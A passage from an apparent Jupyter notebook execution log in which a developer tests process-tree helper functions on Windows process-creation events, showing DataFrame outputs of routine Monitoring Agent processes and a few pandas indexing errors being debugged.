c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x6f8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1201004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1fc0...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1271004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.25300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:12:56.253MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x10bc...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1291004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xb48...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1391004
\n

12 rows × 35 columns

\n
", "text/plain": " TenantId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n\n Account \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \n\n EventID \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \n\n TimeGenerated \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270 \n\n Computer \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \n\n SubjectUserSid \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \n\n SubjectUserName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \n\n SubjectDomainName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \n\n SubjectLogonId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \n\n NewProcessId ... \\\nproc_key ... \nc:\\program files\\microsoft monitoring agent\\age... 0x15c8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xcd8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x8dc ... \nc:\\program files\\microsoft monitoring agent\\age... 0xbd0 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xe34 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x53c ... \nc:\\program files\\microsoft monitoring agent\\age... 0xef4 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xd74 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x6f8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x1fc0 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x10bc ... \nc:\\program files\\microsoft monitoring agent\\age... 0xb48 ... \n\n source_index_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n ProcessId_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n NewProcessName_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n TimeGenerated_orig_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \n\n parent_key \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \n\n IsRoot IsLeaf IsBranch \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \n\n path parent_index \nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1004/5 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/8 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/10 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/15 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/67 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/76 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/78 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/107 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/120 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/127 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/129 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/139 1004 \n\n[12 rows x 35 columns]" }, "execution_count": 63, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings\n# if not include_source:\n# return siblings.loc[~proc]\n# return siblings" }, "executionTime": "2019-12-13T21:11:02.763Z" }, { "cell": { "executionCount": 64, "executionEventId": "e1d75807-599d-41da-a9ec-0005795789e0", "hasError": true, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "ename": "TypeError", "evalue": "bad operand type for unary ~: 'str'", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mTypeError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 2\u001b[0m \u001b[0mproc\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 3\u001b[0m \u001b[0msiblings\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mparent\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[0msiblings\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;33m~\u001b[0m\u001b[0mproc\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 5\u001b[0m \u001b[1;31m# if not include_source:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 6\u001b[0m \u001b[1;31m# return siblings.loc[~proc]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__invert__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1539\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m__invert__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1540\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1541\u001b[1;33m \u001b[0marr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0moperator\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mvalues_from_object\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1542\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__array_wrap__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0marr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1543\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'" ] } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings.loc[~proc]\n# if not include_source:\n# return siblings.loc[~proc]\n# return siblings" }, "executionTime": "2019-12-13T21:11:15.384Z" }, { "cell": { "executionCount": 65, "executionEventId": "63c1ae0f-8040-4d2c-b379-d266a3f47fd9", "hasError": false, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "data": { "text/plain": "TenantId 52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount WORKGROUP\\MSTICAlertsWin1$\nEventID 4688\nTimeGenerated 2019-02-09 20:32:56.260000\nComputer MSTICAlertsWin1\nSubjectUserSid S-1-5-18\nSubjectUserName MSTICAlertsWin1$\nSubjectDomainName WORKGROUP\nSubjectLogonId 0x3e7\nNewProcessId 0x15c8\nNewProcessName C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType %%1936\nProcessId 0x864\nCommandLine \"C:\\Program Files\\Microsoft Monitoring Agent\\A...\nParentProcessName C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTargetLogonId 0x0\nSourceComputerId 263a788b-6526-4cdc-8ed9-d79402fe4aa0\nTimeCreatedUtc 2019-02-09 20:32:56.260000\nEffectiveLogonId 0x3e7\nnew_process_lc c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc c:\\program files\\microsoft monitoring agent\\ag...\nsource_index 5\nNewProcessId_par 0x864\nEffectiveLogonId_par 0x3e7\nnew_process_lc_par c:\\program files\\microsoft monitoring agent\\ag...\nsource_index_par NaN\nProcessId_par NaN\nNewProcessName_par NaN\nTimeGenerated_orig_par 1970-01-01 00:00:00\nparent_key c:\\program files\\microsoft monitoring agent\\ag...\nIsRoot False\nIsLeaf False\nIsBranch True\npath 1004/5\nparent_index 1004\nName: c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000, dtype: object" }, "execution_count": 65, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "proc" }, "executionTime": "2019-12-13T21:11:33.280Z" }, { "cell": { "executionCount": 66, "executionEventId": "0de02c10-9a81-4826-92c8-ac27a3391363", "hasError": false, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "data": { "text/plain": "'c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15c82019-02-09 20:32:56.260000'" }, "execution_count": 66, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "proc.name" }, "executionTime": "2019-12-13T21:11:38.258Z" }, { "cell": { "executionCount": 67, "executionEventId": "03a4f3ac-1ad1-42dc-89e3-86758657220b", "hasError": true, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "ename": "TypeError", "evalue": "bad operand type for unary ~: 'str'", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mTypeError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 2\u001b[0m \u001b[0mproc\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 3\u001b[0m \u001b[0msiblings\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mparent\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[0msiblings\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;33m~\u001b[0m\u001b[0mproc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 5\u001b[0m \u001b[1;31m# if not include_source:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 6\u001b[0m \u001b[1;31m# return siblings.loc[~proc]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'" ] } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings.loc[~proc.name]\n# if not include_source:\n# return siblings.loc[~proc]\n# return siblings" }, "executionTime": "2019-12-13T21:11:45.385Z" }, { "cell": { "executionCount": 68, "executionEventId": "9cce4ddc-8d14-4071-9fb0-08adde8b568e", "hasError": false, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "data": { "text/plain": "TenantId 52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount WORKGROUP\\MSTICAlertsWin1$\nEventID 4688\nTimeGenerated 2019-02-09 20:32:56.260000\nComputer MSTICAlertsWin1\nSubjectUserSid S-1-5-18\nSubjectUserName MSTICAlertsWin1$\nSubjectDomainName WORKGROUP\nSubjectLogonId 0x3e7\nNewProcessId 0x15c8\nNewProcessName C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType %%1936\nProcessId 0x864\nCommandLine \"C:\\Program Files\\Microsoft Monitoring Agent\\A...\nParentProcessName C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTargetLogonId 0x0\nSourceComputerId 263a788b-6526-4cdc-8ed9-d79402fe4aa0\nTimeCreatedUtc 2019-02-09 20:32:56.260000\nEffectiveLogonId 0x3e7\nnew_process_lc c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc c:\\program files\\microsoft monitoring agent\\ag...\nsource_index 5\nNewProcessId_par 0x864\nEffectiveLogonId_par 0x3e7\nnew_process_lc_par c:\\program files\\microsoft monitoring agent\\ag...\nsource_index_par NaN\nProcessId_par NaN\nNewProcessName_par NaN\nTimeGenerated_orig_par 1970-01-01 00:00:00\nparent_key c:\\program files\\microsoft monitoring agent\\ag...\nIsRoot False\nIsLeaf False\nIsBranch True\npath 1004/5\nparent_index 1004\nName: c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000, dtype: object" }, "execution_count": 68, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings.loc[proc.name]\n# if not include_source:\n# return siblings.loc[~proc]\n# return siblings" }, "executionTime": "2019-12-13T21:12:30.343Z" }, { "cell": { "executionCount": 69, "executionEventId": 